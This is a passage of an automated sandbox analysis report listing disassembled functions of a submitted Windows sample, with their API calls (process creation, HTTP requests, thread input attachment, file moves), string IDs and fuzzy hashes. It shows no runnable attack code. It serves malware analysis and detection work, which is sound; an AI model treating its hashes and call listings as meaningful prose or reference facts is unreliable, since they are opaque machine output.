                                          • Opcode Fuzzy Hash: 85b49ef428d52ce04e069301b69baa83b392dcf4829693a20f22fab991a05041
                                          • Instruction Fuzzy Hash: 6E516F326046009FDB50DF25DC45B6A7BE8EF88720F158969F99ADB2E1DB70E800DB42
                                          Function 0096B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096B4D0
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0096B546
                                          • GetLastError.KERNEL32 ref: 0096B550
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0096B5BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 02f2719db898b45de41f167e40f39984fff2ec2f809929089779b2a61d8f19b1
                                          • Instruction ID: 8d6932e19da54e7da9823b6d1f568180a818f68a64b0175056e713294a670195
                                          • Opcode Fuzzy Hash: 02f2719db898b45de41f167e40f39984fff2ec2f809929089779b2a61d8f19b1
                                          • Instruction Fuzzy Hash: 7D316135A00209AFCB00EB68C895FEEB7B8FF89314F144565F516D7291EB719A82CB51
                                          Function 00958F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00959014
                                          • GetDlgCtrlID.USER32 ref: 0095901F
                                          • GetParent.USER32 ref: 0095903B
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095903E
                                          • GetDlgCtrlID.USER32(?), ref: 00959047
                                          • GetParent.USER32(?), ref: 00959063
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00959066
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e52c947309e6d67a305a6e664449c7acee3c1f24ccb3c07eb6aebfa530f6e1a6
                                          • Instruction ID: 8707f909ee11ce5296d51796764d52216cd9c8f824835fa27de4a355defec4d5
                                          • Opcode Fuzzy Hash: e52c947309e6d67a305a6e664449c7acee3c1f24ccb3c07eb6aebfa530f6e1a6
                                          • Instruction Fuzzy Hash: 7021A174A10108BFDF05EBA1CC95EFEBB79EF89320F100615B961972E1EB755819DB20
                                          Function 0095907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009590FD
                                          • GetDlgCtrlID.USER32 ref: 00959108
                                          • GetParent.USER32 ref: 00959124
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00959127
                                          • GetDlgCtrlID.USER32(?), ref: 00959130
                                          • GetParent.USER32(?), ref: 0095914C
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095914F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: b1084ad8c1f4fac1eb9ad72d48059b4633db39e7e190fe745b75061d28999ab3
                                          • Instruction ID: c1fce4a443f073e5d799d85f2d23ec8a593807b361cd02d51634615eaa46dc0f
                                          • Opcode Fuzzy Hash: b1084ad8c1f4fac1eb9ad72d48059b4633db39e7e190fe745b75061d28999ab3
                                          • Instruction Fuzzy Hash: 1421A174A04108BFDF01EBA5CC95EFEBB69EF84311F104515B911972E1EB755819DB20
                                          Function 00959163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 0095916F
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00959184
                                          • _wcscmp.LIBCMT ref: 00959196
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00959211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: ae11d7437aa6909a6de3b12ca70aee106288567c07ff4055024caad1fe61ae28
                                          • Instruction ID: 2562bd6e39a611a3f3b5a04179d78f2ecb9ada38818cbe2f835646ca07b747ac
                                          • Opcode Fuzzy Hash: ae11d7437aa6909a6de3b12ca70aee106288567c07ff4055024caad1fe61ae28
                                          • Instruction Fuzzy Hash: 5111593624C317FAFA106725EC0AEEB779CDB91735F200126FD10E00D5FE6168156B90
                                          Function 009788AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 009788D7
                                          • CoInitialize.OLE32(00000000), ref: 00978904
                                          • CoUninitialize.OLE32 ref: 0097890E
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00978A0E
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00978B3B
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00992C0C), ref: 00978B6F
                                          • CoGetObject.OLE32(?,00000000,00992C0C,?), ref: 00978B92
                                          • SetErrorMode.KERNEL32(00000000), ref: 00978BA5
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00978C25
                                          • VariantClear.OLEAUT32(?), ref: 00978C35
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 9fed46df93ee2b5cac96368a91b3b7940dbf0dc153c95efc3d616302984ea285
                                          • Instruction ID: 821644b2fe98d74d116a86b99382ca597135de49f1da362f9bbc13ebded8d5e5
                                          • Opcode Fuzzy Hash: 9fed46df93ee2b5cac96368a91b3b7940dbf0dc153c95efc3d616302984ea285
                                          • Instruction Fuzzy Hash: A4C118B1608305AFD700DF64C888A2BB7E9FF89748F00895DF98A9B251DB71ED05CB52
                                          Function 00967990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00967A6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ArraySafeVartype
                                          • String ID:
                                          • API String ID: 1725837607-0
                                          • Opcode ID: 298aa56f0c2cd803265027d828551c6fdee482e9c0c37dd3986ee76452deae87
                                          • Instruction ID: 6a0167f65848316b6f9bd5dad8d0da4992ecf0000ff3cbb7e9dbddc2ef0bd41a
                                          • Opcode Fuzzy Hash: 298aa56f0c2cd803265027d828551c6fdee482e9c0c37dd3986ee76452deae87
                                          • Instruction Fuzzy Hash: 6EB18D7190821A9FDB00DFE4C885BBEB7B8EF49329F204469E541EB391D738A941DB90
                                          Function 009611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 009611F0
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00960268,?,00000001), ref: 00961204
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0096120B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 0096121A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096122C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 00961245
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 00961257
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 0096129C
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 009612B1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00960268,?,00000001), ref: 009612BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 42df8b8a45c0957bd6d64e60a9714ba3e7acc02411e326ed4345a0c8ed43ba1b
                                          • Instruction ID: 5629dca3462d7ee4be2ff69b958caa4d3dadeee9f6a83bd15010a6d1b7540d2d
                                          • Opcode Fuzzy Hash: 42df8b8a45c0957bd6d64e60a9714ba3e7acc02411e326ed4345a0c8ed43ba1b
                                          • Instruction Fuzzy Hash: 3E31E175A28208FFDB109F54ECA8F6A37ADEF54315F144229FD10C62A0D7749D80AB60
                                          Function 0090FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0090FAA6
                                          • OleUninitialize.OLE32(?,00000000), ref: 0090FB45
                                          • UnregisterHotKey.USER32(?), ref: 0090FC9C
                                          • DestroyWindow.USER32(?), ref: 009445D6
                                          • FreeLibrary.KERNEL32(?), ref: 0094463B
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00944668
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: cc7b53bdcaf17d3b60d9c1370d0476d608c6ddd3d3ac68dcbd5ccde5d982ddf7
                                          • Instruction ID: 189ba550f8031286e1f01034936ec0c52ca4221e1d4e4f895b3b40ee13a3c6d1
                                          • Opcode Fuzzy Hash: cc7b53bdcaf17d3b60d9c1370d0476d608c6ddd3d3ac68dcbd5ccde5d982ddf7
                                          • Instruction Fuzzy Hash: C2A17E30701216CFDB29EF14C5A5F69F368BF45700F5542ADE80AAB6A2DB30AD56CF90
                                          Function 0095A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumChildWindows.USER32(?,0095A439), ref: 0095A377
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: a1a1e5efbb5bef740fe033ae57948d05c5d657099506875de6a53cf4652eab92
                                          • Instruction ID: 960e0ab2dc3af6909063f8561d4c919313d80662d0f2ba09dda0f386135936a9
                                          • Opcode Fuzzy Hash: a1a1e5efbb5bef740fe033ae57948d05c5d657099506875de6a53cf4652eab92
                                          • Instruction Fuzzy Hash: 0091D530A04605AECB08DFA1D492BEDFBB8BF84315F508319EC59A7181DB31699DCB95
                                          Function 00902E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00902EAE
                                            • Part of subcall function 00901DB3: GetClientRect.USER32(?,?), ref: 00901DDC
                                            • Part of subcall function 00901DB3: GetWindowRect.USER32(?,?), ref: 00901E1D
                                            • Part of subcall function 00901DB3: ScreenToClient.USER32(?,?), ref: 00901E45
                                          • GetDC.USER32 ref: 0093CD32
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0093CD45
                                          • SelectObject.GDI32(00000000,00000000), ref: 0093CD53
                                          • SelectObject.GDI32(00000000,00000000), ref: 0093CD68
                                          • ReleaseDC.USER32(?,00000000), ref: 0093CD70
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093CDFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: f51b7d96ea9c9d9a69e8b497ccbaff694aed991040db100ab4b280c65e146c50
                                          • Instruction ID: b96e58e0a55dd89cfb8bd56a085532c7779e60cfc4d28b60e38e7272f8cb215a
                                          • Opcode Fuzzy Hash: f51b7d96ea9c9d9a69e8b497ccbaff694aed991040db100ab4b280c65e146c50
                                          • Instruction Fuzzy Hash: 1F71E471504605DFCF218F64C888AAA7BB9FF48320F14467AFD65AA2E6D7319C81DF60
                                          Function 00971A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00971A50
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00971A7C
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00971ABE
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00971AD3
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971AE0
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00971B10
                                          • InternetCloseHandle.WININET(00000000), ref: 00971B57
                                            • Part of subcall function 00972483: GetLastError.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 00972498
                                            • Part of subcall function 00972483: SetEvent.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 009724AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 2603140658-3916222277
                                          • Opcode ID: 226858b8b383fcca8995f78f88005903f964549aa33862e7ddab6a6f89f4129c
                                          • Instruction ID: 46d335295456992083f16b47a34df15ad6f4586c9da84c81ede89f3f1dc04e42
                                          • Opcode Fuzzy Hash: 226858b8b383fcca8995f78f88005903f964549aa33862e7ddab6a6f89f4129c
                                          • Instruction Fuzzy Hash: C74190B2511218BFEB118F54CC89FBB7BACEF48350F008126F9099A245E7749E409BA4
                                          Function 00978C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0098F910), ref: 00978D28
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0098F910), ref: 00978D5C
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00978ED6
                                          • SysFreeString.OLEAUT32(?), ref: 00978F00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: 77e46bf0d52db4914506e2bb4fe2924a7b3d7405fb93bf3390d876bce6c9c200
                                          • Instruction ID: 96e8555479469db378e02533a55194ebf5bb2b7938e30e64eda8aa9a091e3103
                                          • Opcode Fuzzy Hash: 77e46bf0d52db4914506e2bb4fe2924a7b3d7405fb93bf3390d876bce6c9c200
                                          • Instruction Fuzzy Hash: 46F11C72A00109EFDF14DF94C888EAEB7B9FF85315F148458F909AB251DB31AE45CB51
                                          Function 0097F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0097F6B5
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0097F848
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0097F86C
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0097F8AC
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0097F8CE
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0097FA4A
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0097FA7C
                                          • CloseHandle.KERNEL32(?), ref: 0097FAAB
                                          • CloseHandle.KERNEL32(?), ref: 0097FB22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: e086775b91a8023a814d003b5513528ff23df9402a0ce98b91aacd5f31bc834d
                                          • Instruction ID: 355ae0160ed177b2abd176f8f220e1e2779cc9f49a5ed4ad295fe89e9d9fe34b
                                          • Opcode Fuzzy Hash: e086775b91a8023a814d003b5513528ff23df9402a0ce98b91aacd5f31bc834d
                                          • Instruction Fuzzy Hash: 3CE1A1726043009FC714EF24C8A1B6ABBE5AF85354F14C96DF899AB2A2DB30DC45CB52
                                          Function 00964CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00963697,?), ref: 0096468B
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00963697,?), ref: 009646A4
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00964D40
                                          • _wcscmp.LIBCMT ref: 00964D5A
                                          • MoveFileW.KERNEL32(?,?), ref: 00964D75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: cd88d4305d6cd96823d2abe4de5fab6273fdb0eaa2150bcbbf344e11af8ab31c
                                          • Instruction ID: 70940b006539ccca0216815958a32f5b6691f43719c121148ae2d9599c765381
                                          • Opcode Fuzzy Hash: cd88d4305d6cd96823d2abe4de5fab6273fdb0eaa2150bcbbf344e11af8ab31c
                                          • Instruction Fuzzy Hash: 1E5156B24083459FC725EBA0D891ADFB3ECAFC5350F40092EB289D3191EF35A588C766
                                          Function 00988645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009886FF
                                          Memory Dump Source
